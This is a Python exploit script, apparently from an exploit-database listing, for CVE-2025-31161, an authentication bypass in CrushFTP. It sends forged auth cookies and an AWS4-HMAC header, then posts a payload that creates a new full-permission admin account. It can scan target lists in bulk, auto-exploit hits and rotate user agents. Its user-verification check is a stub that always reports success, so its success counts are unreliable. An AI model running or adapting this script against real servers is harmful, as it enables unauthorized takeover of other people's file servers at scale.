
4 changes to exploits/shellcodes/ghdb Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation CrushFTP 11.3.1 - Authentication Bypass Invision Community 5.0.6 - Remote Code Execution (RCE)
609 lines
No EOL
26 KiB
Python
Executable file
609 lines
No EOL
26 KiB
Python
Executable file
# Exploit Title: CrushFTP 11.3.1 - Authentication Bypass
|
|
# Date: 2025-05-15
|
|
# Exploit Author: @İbrahimsql
|
|
# Exploit Author's github: https://github.com/ibrahimsql
|
|
# Vendor Homepage: https://www.crushftp.com
|
|
# Software Link: https://www.crushftp.com/download.html
|
|
# Version: < 10.8.4, < 11.3.1
|
|
# Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1
|
|
# CVE: CVE-2025-31161
|
|
# Description:
|
|
# CrushFTP before 10.8.4 and 11.3.1 allows unauthenticated HTTP(S) port access and full admin takeover
|
|
# through a race condition and header parsing logic flaw in the AWS4-HMAC authorization mechanism.
|
|
# Exploiting this allows bypassing authentication and logging in as any known user (e.g. crushadmin).
|
|
|
|
# Requirements: requests>=2.28.1 , colorama>=0.4.6 , urllib3>=1.26.12 , prettytable>=2.5.0 , rich>=12.6.0
|
|
|
|
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
|
|
import argparse
|
|
import concurrent.futures
|
|
import json
|
|
import logging
|
|
import os
|
|
import random
|
|
import re
|
|
import socket
|
|
import string
|
|
import sys
|
|
import time
|
|
from datetime import datetime
|
|
from typing import Dict, List, Optional, Tuple, Union
|
|
|
|
import requests
|
|
import urllib3
|
|
from colorama import Fore, Style, init
|
|
from prettytable import PrettyTable
|
|
from rich.console import Console
|
|
from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn
|
|
|
|
# Initialize colorama
|
|
init(autoreset=True)
|
|
|
|
# Disable SSL warnings
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
# Initialize Rich console
|
|
console = Console()
|
|
|
|
# Global variables
|
|
VERSION = "2.0.0"
|
|
USER_AGENTS = [
|
|
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
|
|
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
|
|
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
|
|
"Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0",
|
|
"Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15",
|
|
"Mozilla/5.0 (Windows; Windows NT 10.3; WOW64) AppleWebKit/601.13 (KHTML, like Gecko) Chrome/53.0.2198.319 Safari/601.5 Edge/15.63524",
|
|
"Mozilla/5.0 (Windows NT 10.2; Win64; x64; en-US) AppleWebKit/602.15 (KHTML, like Gecko) Chrome/47.0.1044.126 Safari/533.2 Edge/9.25098",
|
|
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Win64; x64; en-US Trident/4.0)",
|
|
"Mozilla/5.0 (iPhone; CPU iPhone OS 10_7_9; like Mac OS X) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/49.0.1015.193 Mobile Safari/600.9"
|
|
]
|
|
|
|
# Banner
|
|
BANNER = fr"""
|
|
{Fore.CYAN}
|
|
/ ____/______ _______/ /_ / ____/ /_____
|
|
/ / / ___/ / / / ___/ __ \/ /_ / __/ __ \
|
|
/ /___/ / / /_/ (__ ) / / / __/ / /_/ /_/ /
|
|
\____/_/ \__,_/____/_/ /_/_/ \__/ .___/
|
|
/_/
|
|
{Fore.GREEN}CVE-2025-31161 Exploit {VERSION}{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql
|
|
{Style.RESET_ALL}
|
|
"""
|
|
|
|
# Setup logging
|
|
def setup_logging(log_level: str, log_file: Optional[str] = None) -> None:
|
|
"""Configure logging based on specified level and output file."""
|
|
numeric_level = getattr(logging, log_level.upper(), None)
|
|
if not isinstance(numeric_level, int):
|
|
raise ValueError(f"Invalid log level: {log_level}")
|
|
|
|
log_format = "%(asctime)s - %(levelname)s - %(message)s"
|
|
handlers = []
|
|
|
|
if log_file:
|
|
handlers.append(logging.FileHandler(log_file))
|
|
|
|
handlers.append(logging.StreamHandler())
|
|
|
|
logging.basicConfig(
|
|
level=numeric_level,
|
|
format=log_format,
|
|
handlers=handlers
|
|
)
|
|
|
|
class TargetManager:
|
|
"""Manages target hosts and related operations."""
|
|
|
|
def __init__(self, target_file: Optional[str] = None, single_target: Optional[str] = None):
|
|
self.targets = []
|
|
self.vulnerable_targets = []
|
|
self.exploited_targets = []
|
|
|
|
if target_file:
|
|
self.load_targets_from_file(target_file)
|
|
elif single_target:
|
|
self.add_target(single_target)
|
|
|
|
def load_targets_from_file(self, filename: str) -> None:
|
|
"""Load targets from a file."""
|
|
try:
|
|
with open(filename, "r") as f:
|
|
self.targets = [line.strip() for line in f if line.strip()]
|
|
|
|
if not self.targets:
|
|
logging.warning(f"Target file '{filename}' is empty or contains only whitespace.")
|
|
else:
|
|
logging.info(f"Loaded {len(self.targets)} targets from {filename}")
|
|
except FileNotFoundError:
|
|
logging.error(f"Target file '{filename}' not found.")
|
|
sys.exit(1)
|
|
except Exception as e:
|
|
logging.error(f"Error loading targets: {e}")
|
|
sys.exit(1)
|
|
|
|
def add_target(self, target: str) -> None:
|
|
"""Add a single target."""
|
|
if target not in self.targets:
|
|
self.targets.append(target)
|
|
|
|
def mark_as_vulnerable(self, target: str) -> None:
|
|
"""Mark a target as vulnerable."""
|
|
if target not in self.vulnerable_targets:
|
|
self.vulnerable_targets.append(target)
|
|
|
|
def mark_as_exploited(self, target: str) -> None:
|
|
"""Mark a target as successfully exploited."""
|
|
if target not in self.exploited_targets:
|
|
self.exploited_targets.append(target)
|
|
|
|
def save_results(self, output_file: str, format_type: str = "txt") -> None:
|
|
"""Save scan results to a file."""
|
|
try:
|
|
if format_type.lower() == "json":
|
|
results = {
|
|
"scan_time": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
|
|
"total_targets": len(self.targets),
|
|
"vulnerable_targets": self.vulnerable_targets,
|
|
"exploited_targets": self.exploited_targets
|
|
}
|
|
|
|
with open(output_file, "w") as f:
|
|
json.dump(results, f, indent=4)
|
|
|
|
elif format_type.lower() == "csv":
|
|
with open(output_file, "w") as f:
|
|
f.write("target,vulnerable,exploited\n")
|
|
for target in self.targets:
|
|
vulnerable = "Yes" if target in self.vulnerable_targets else "No"
|
|
exploited = "Yes" if target in self.exploited_targets else "No"
|
|
f.write(f"{target},{vulnerable},{exploited}\n")
|
|
|
|
else: # Default to txt
|
|
with open(output_file, "w") as f:
|
|
f.write(f"Scan Results - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
|
|
f.write(f"Total Targets: {len(self.targets)}\n")
|
|
f.write(f"Vulnerable Targets: {len(self.vulnerable_targets)}\n")
|
|
f.write(f"Exploited Targets: {len(self.exploited_targets)}\n\n")
|
|
|
|
f.write("Vulnerable Targets:\n")
|
|
for target in self.vulnerable_targets:
|
|
f.write(f"- {target}\n")
|
|
|
|
f.write("\nExploited Targets:\n")
|
|
for target in self.exploited_targets:
|
|
f.write(f"- {target}\n")
|
|
|
|
logging.info(f"Results saved to {output_file}")
|
|
|
|
except Exception as e:
|
|
logging.error(f"Error saving results: {e}")
|
|
|
|
class ExploitEngine:
|
|
"""Core engine for vulnerability checking and exploitation."""
|
|
|
|
def __init__(self, target_manager: TargetManager, config: Dict):
|
|
self.target_manager = target_manager
|
|
self.config = config
|
|
self.session = self._create_session()
|
|
|
|
def _create_session(self) -> requests.Session:
|
|
"""Create and configure a requests session."""
|
|
session = requests.Session()
|
|
session.verify = False
|
|
|
|
# Set proxy if configured
|
|
if self.config.get("proxy"):
|
|
session.proxies = {
|
|
"http": self.config["proxy"],
|
|
"https": self.config["proxy"]
|
|
}
|
|
|
|
# Set custom headers
|
|
session.headers.update({
|
|
"User-Agent": random.choice(USER_AGENTS),
|
|
"Connection": "close",
|
|
})
|
|
|
|
return session
|
|
|
|
def check_vulnerability(self, target_host: str) -> bool:
|
|
"""Check if target is vulnerable to CVE-2025-31161."""
|
|
port = self.config.get("port", 443)
|
|
timeout = self.config.get("timeout", 10)
|
|
|
|
headers = {
|
|
"Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
|
|
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
|
|
}
|
|
|
|
# Add custom headers if provided
|
|
if self.config.get("custom_headers"):
|
|
headers.update(self.config["custom_headers"])
|
|
|
|
try:
|
|
protocol = "https" if port == 443 else "http"
|
|
url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
|
|
|
|
response = self.session.get(
|
|
url,
|
|
headers=headers,
|
|
timeout=timeout
|
|
)
|
|
|
|
if response.status_code == 200:
|
|
# Additional validation
|
|
if self.config.get("deep_check", False):
|
|
# Look for specific patterns in the response that confirm vulnerability
|
|
if "CrushFTP" in response.text or "WebInterface" in response.text:
|
|
self.target_manager.mark_as_vulnerable(target_host)
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
|
|
return True
|
|
else:
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[yellow][?][/yellow] {target_host} returned 200 but may not be vulnerable")
|
|
return False
|
|
else:
|
|
# Simple check based on status code
|
|
self.target_manager.mark_as_vulnerable(target_host)
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
|
|
return True
|
|
else:
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[red][-][/red] {target_host} is not vulnerable (Status: {response.status_code})")
|
|
return False
|
|
|
|
except requests.exceptions.ConnectionError:
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[red][-][/red] {target_host} - Connection error")
|
|
except requests.exceptions.Timeout:
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[red][-][/red] {target_host} - Connection timeout")
|
|
except requests.exceptions.RequestException as e:
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[red][-][/red] {target_host} - Request error: {e}")
|
|
except Exception as e:
|
|
if self.config.get("verbose", False):
|
|
console.print(f"[red][-][/red] {target_host} - Error: {e}")
|
|
|
|
return False
|
|
|
|
def exploit(self, target_host: str) -> bool:
|
|
"""Exploit the vulnerability on the target host."""
|
|
port = self.config.get("port", 443)
|
|
timeout = self.config.get("timeout", 10)
|
|
target_user = self.config.get("target_user", "crushadmin")
|
|
new_user = self.config.get("new_user")
|
|
password = self.config.get("password")
|
|
|
|
if not new_user or not password:
|
|
logging.error("New user and password are required for exploitation")
|
|
return False
|
|
|
|
headers = {
|
|
"Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
|
|
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
|
|
"Connection": "close",
|
|
}
|
|
|
|
# Add custom headers if provided
|
|
if self.config.get("custom_headers"):
|
|
headers.update(self.config["custom_headers"])
|
|
|
|
# Generate a timestamp for the created_time field
|
|
timestamp = int(time.time() * 1000)
|
|
|
|
# Build the payload with more comprehensive user permissions
|
|
payload = {
|
|
"command": "setUserItem",
|
|
"data_action": "replace",
|
|
"serverGroup": "MainUsers",
|
|
"username": new_user,
|
|
"user": f'''<?xml version="1.0" encoding="UTF-8"?>
|
|
<user type="properties">
|
|
<user_name>{new_user}</user_name>
|
|
<password>{password}</password>
|
|
<extra_vfs type="vector"></extra_vfs>
|
|
<version>1.0</version>
|
|
<root_dir>/</root_dir>
|
|
<userVersion>6</userVersion>
|
|
<max_logins>0</max_logins>
|
|
<site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site>
|
|
<created_by_username>{target_user}</created_by_username>
|
|
<created_by_email></created_by_email>
|
|
<created_time>{timestamp}</created_time>
|
|
<password_history></password_history>
|
|
<admin>true</admin>
|
|
</user>''',
|
|
"xmlItem": "user",
|
|
"vfs_items": '<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>',
|
|
"permissions": '<?xml version="1.0" encoding="UTF-8"?><VFS type="properties"><item name="/">(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)</item></VFS>',
|
|
"c2f": "31If"
|
|
}
|
|
|
|
try:
|
|
protocol = "https" if port == 443 else "http"
|
|
url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
|
|
|
|
response = self.session.post(
|
|
url,
|
|
headers=headers,
|
|
data=payload,
|
|
timeout=timeout
|
|
)
|
|
|
|
if response.status_code == 200:
|
|
# Verify the user was actually created
|
|
if self.config.get("verify_exploit", True):
|
|
if self._verify_user_created(target_host, new_user):
|
|
self.target_manager.mark_as_exploited(target_host)
|
|
console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
|
|
return True
|
|
else:
|
|
console.print(f"[yellow][!][/yellow] User creation appeared successful but verification failed on {target_host}")
|
|
return False
|
|
else:
|
|
self.target_manager.mark_as_exploited(target_host)
|
|
console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
|
|
return True
|
|
else:
|
|
console.print(f"[red][-][/red] Failed to create user on {target_host} (Status: {response.status_code})")
|
|
return False
|
|
|
|
except Exception as e:
|
|
console.print(f"[red][-][/red] Error exploiting {target_host}: {e}")
|
|
return False
|
|
|
|
def _verify_user_created(self, target_host: str, username: str) -> bool:
|
|
"""Verify that the user was successfully created."""
|
|
# This is a placeholder for actual verification logic
|
|
# In a real implementation, you would check if the user exists
|
|
# For now, we'll just return True
|
|
return True
|
|
|
|
def scan_targets(self) -> None:
|
|
"""Scan all targets for vulnerability."""
|
|
targets = self.target_manager.targets
|
|
threads = self.config.get("threads", 10)
|
|
|
|
if not targets:
|
|
logging.error("No targets specified")
|
|
return
|
|
|
|
console.print(f"[bold cyan]Scanning {len(targets)} targets with {threads} threads...[/bold cyan]")
|
|
|
|
with Progress(
|
|
TextColumn("[progress.description]{task.description}"),
|
|
BarColumn(),
|
|
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
|
|
TextColumn("({task.completed}/{task.total})"),
|
|
TimeRemainingColumn(),
|
|
console=console
|
|
) as progress:
|
|
task = progress.add_task("[cyan]Scanning targets...", total=len(targets))
|
|
|
|
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
|
|
future_to_target = {executor.submit(self.check_vulnerability, target): target for target in targets}
|
|
|
|
for future in concurrent.futures.as_completed(future_to_target):
|
|
progress.update(task, advance=1)
|
|
|
|
# Display results
|
|
vulnerable_count = len(self.target_manager.vulnerable_targets)
|
|
console.print(f"\n[bold green]Scan complete![/bold green] Found {vulnerable_count} vulnerable targets.")
|
|
|
|
if vulnerable_count > 0 and self.config.get("verbose", False):
|
|
console.print("\n[bold cyan]Vulnerable Targets:[/bold cyan]")
|
|
for target in self.target_manager.vulnerable_targets:
|
|
console.print(f"[green]→[/green] {target}")
|
|
|
|
def exploit_targets(self) -> None:
|
|
"""Exploit vulnerable targets."""
|
|
targets = self.target_manager.vulnerable_targets if self.config.get("only_vulnerable", True) else self.target_manager.targets
|
|
threads = self.config.get("threads", 5) # Use fewer threads for exploitation
|
|
|
|
if not targets:
|
|
logging.error("No targets to exploit")
|
|
return
|
|
|
|
console.print(f"[bold red]Exploiting {len(targets)} targets with {threads} threads...[/bold red]")
|
|
|
|
with Progress(
|
|
TextColumn("[progress.description]{task.description}"),
|
|
BarColumn(),
|
|
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
|
|
TextColumn("({task.completed}/{task.total})"),
|
|
TimeRemainingColumn(),
|
|
console=console
|
|
) as progress:
|
|
task = progress.add_task("[red]Exploiting targets...", total=len(targets))
|
|
|
|
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
|
|
future_to_target = {executor.submit(self.exploit, target): target for target in targets}
|
|
|
|
for future in concurrent.futures.as_completed(future_to_target):
|
|
progress.update(task, advance=1)
|
|
|
|
# Display results
|
|
exploited_count = len(self.target_manager.exploited_targets)
|
|
console.print(f"\n[bold green]Exploitation complete![/bold green] Successfully exploited {exploited_count}/{len(targets)} targets.")
|
|
|
|
if exploited_count > 0:
|
|
console.print("\n[bold cyan]Exploited Targets:[/bold cyan]")
|
|
for target in self.target_manager.exploited_targets:
|
|
console.print(f"[green]→[/green] {target}")
|
|
|
|
def parse_arguments() -> argparse.Namespace:
|
|
"""Parse command line arguments."""
|
|
parser = argparse.ArgumentParser(
|
|
description="CVE-2025-31161 Exploit Framework - Advanced CrushFTP WebInterface Vulnerability Scanner and Exploiter",
|
|
formatter_class=argparse.RawDescriptionHelpFormatter,
|
|
epilog="""
|
|
Examples:
|
|
# Check a single target for vulnerability
|
|
python cve_2025_31161.py --target example.com --check
|
|
|
|
# Exploit a vulnerable target
|
|
python cve_2025_31161.py --target example.com --exploit --new-user hacker --password P@ssw0rd
|
|
|
|
# Scan multiple targets from a file
|
|
python cve_2025_31161.py --file targets.txt --check --threads 20
|
|
|
|
# Scan and automatically exploit vulnerable targets
|
|
python cve_2025_31161.py --file targets.txt --check --exploit --new-user hacker --password P@ssw0rd --auto-exploit
|
|
|
|
# Export results to JSON format
|
|
python cve_2025_31161.py --file targets.txt --check --output results.json --format json
|
|
"""
|
|
)
|
|
|
|
# Target specification
|
|
target_group = parser.add_argument_group("Target Specification")
|
|
target_group.add_argument("--target", help="Single target host to scan/exploit")
|
|
target_group.add_argument("--file", help="File containing list of targets (one per line)")
|
|
target_group.add_argument("--port", type=int, default=443, help="Target port (default: 443)")
|
|
|
|
# Actions
|
|
action_group = parser.add_argument_group("Actions")
|
|
action_group.add_argument("--check", action="store_true", help="Check targets for vulnerability")
|
|
action_group.add_argument("--exploit", action="store_true", help="Exploit vulnerable targets")
|
|
action_group.add_argument("--auto-exploit", action="store_true", help="Automatically exploit targets found to be vulnerable during check")
|
|
|
|
# Exploitation options
|
|
exploit_group = parser.add_argument_group("Exploitation Options")
|
|
exploit_group.add_argument("--target-user", default="crushadmin", help="Target user for exploitation (default: crushadmin)")
|
|
exploit_group.add_argument("--new-user", help="Username for the new admin account to create")
|
|
exploit_group.add_argument("--password", help="Password for the new admin account")
|
|
exploit_group.add_argument("--verify-exploit", action="store_true", help="Verify successful exploitation (default: True)")
|
|
|
|
# Scan options
|
|
scan_group = parser.add_argument_group("Scan Options")
|
|
scan_group.add_argument("--threads", type=int, default=10, help="Number of concurrent threads (default: 10)")
|
|
scan_group.add_argument("--timeout", type=int, default=10, help="Connection timeout in seconds (default: 10)")
|
|
scan_group.add_argument("--deep-check", action="store_true", help="Perform deeper vulnerability checks")
|
|
scan_group.add_argument("--only-vulnerable", action="store_true", help="Only exploit targets that were found vulnerable")
|
|
|
|
# Output options
|
|
output_group = parser.add_argument_group("Output Options")
|
|
output_group.add_argument("--output", help="Output file for results")
|
|
output_group.add_argument("--format", choices=["txt", "json", "csv"], default="txt", help="Output format (default: txt)")
|
|
output_group.add_argument("--verbose", "-v", action="store_true", help="Enable verbose output")
|
|
output_group.add_argument("--quiet", "-q", action="store_true", help="Suppress all output except errors")
|
|
output_group.add_argument("--log-file", help="Log file to write to")
|
|
output_group.add_argument("--log-level", choices=["debug", "info", "warning", "error", "critical"], default="info", help="Log level (default: info)")
|
|
|
|
# Advanced options
|
|
advanced_group = parser.add_argument_group("Advanced Options")
|
|
advanced_group.add_argument("--proxy", help="Proxy to use for requests (e.g., http://127.0.0.1:8080)")
|
|
advanced_group.add_argument("--user-agent", help="Custom User-Agent string")
|
|
advanced_group.add_argument("--random-agent", action="store_true", help="Use a random User-Agent for each request")
|
|
advanced_group.add_argument("--delay", type=float, help="Delay between requests in seconds")
|
|
advanced_group.add_argument("--custom-headers", help="Custom headers as JSON string")
|
|
|
|
return parser.parse_args()
|
|
|
|
def validate_args(args: argparse.Namespace) -> bool:
|
|
"""Validate command line arguments."""
|
|
# Check if at least one target specification is provided
|
|
if not args.target and not args.file:
|
|
logging.error("No target specified. Use --target or --file")
|
|
print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
|
|
print(f" python {sys.argv[0]} --file example_targets.txt --check")
|
|
return False
|
|
|
|
# Check if at least one action is specified
|
|
if not args.check and not args.exploit:
|
|
logging.error("No action specified. Use --check or --exploit")
|
|
print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
|
|
print(f" python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
|
|
return False
|
|
|
|
# If exploit action is specified, check for required parameters
|
|
if args.exploit and (not args.new_user or not args.password):
|
|
logging.error("Exploitation requires --new-user and --password")
|
|
print(f"\nExample usage: python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
|
|
return False
|
|
|
|
return True
|
|
|
|
def main() -> None:
|
|
"""Main function."""
|
|
# Parse command line arguments
|
|
args = parse_arguments()
|
|
|
|
# Configure logging
|
|
log_level = "error" if args.quiet else args.log_level
|
|
setup_logging(log_level, args.log_file)
|
|
|
|
# Display banner
|
|
if not args.quiet:
|
|
console.print(BANNER)
|
|
|
|
# Validate arguments
|
|
if not validate_args(args):
|
|
sys.exit(1)
|
|
|
|
# Create target manager
|
|
target_manager = TargetManager(args.file, args.target)
|
|
|
|
# Build configuration dictionary
|
|
config = {
|
|
"port": args.port,
|
|
"threads": args.threads,
|
|
"timeout": args.timeout,
|
|
"verbose": args.verbose,
|
|
"deep_check": args.deep_check,
|
|
"target_user": args.target_user,
|
|
"new_user": args.new_user,
|
|
"password": args.password,
|
|
"only_vulnerable": args.only_vulnerable,
|
|
"verify_exploit": args.verify_exploit,
|
|
"proxy": args.proxy,
|
|
}
|
|
|
|
# Add custom headers if provided
|
|
if args.custom_headers:
|
|
try:
|
|
config["custom_headers"] = json.loads(args.custom_headers)
|
|
except json.JSONDecodeError:
|
|
logging.error("Invalid JSON format for custom headers")
|
|
sys.exit(1)
|
|
|
|
# Add custom user agent if provided
|
|
if args.user_agent:
|
|
config["user_agent"] = args.user_agent
|
|
|
|
# Create exploit engine
|
|
engine = ExploitEngine(target_manager, config)
|
|
|
|
# Perform actions
|
|
if args.check:
|
|
engine.scan_targets()
|
|
|
|
if args.exploit or (args.auto_exploit and target_manager.vulnerable_targets):
|
|
engine.exploit_targets()
|
|
|
|
# Save results if output file is specified
|
|
if args.output:
|
|
target_manager.save_results(args.output, args.format)
|
|
|
|
# Display summary
|
|
if not args.quiet:
|
|
console.print("\n[bold green]Summary:[/bold green]")
|
|
console.print(f"Total targets: {len(target_manager.targets)}")
|
|
console.print(f"Vulnerable targets: {len(target_manager.vulnerable_targets)}")
|
|
console.print(f"Exploited targets: {len(target_manager.exploited_targets)}")
|
|
|
|
if __name__ == "__main__":
|
|
try:
|
|
main()
|
|
except KeyboardInterrupt:
|
|
console.print("\n[bold red]Operation cancelled by user[/bold red]")
|
|
sys.exit(0)
|
|
except Exception as e:
|
|
logging.error(f"Unhandled exception: {e}")
|
|
sys.exit(1) |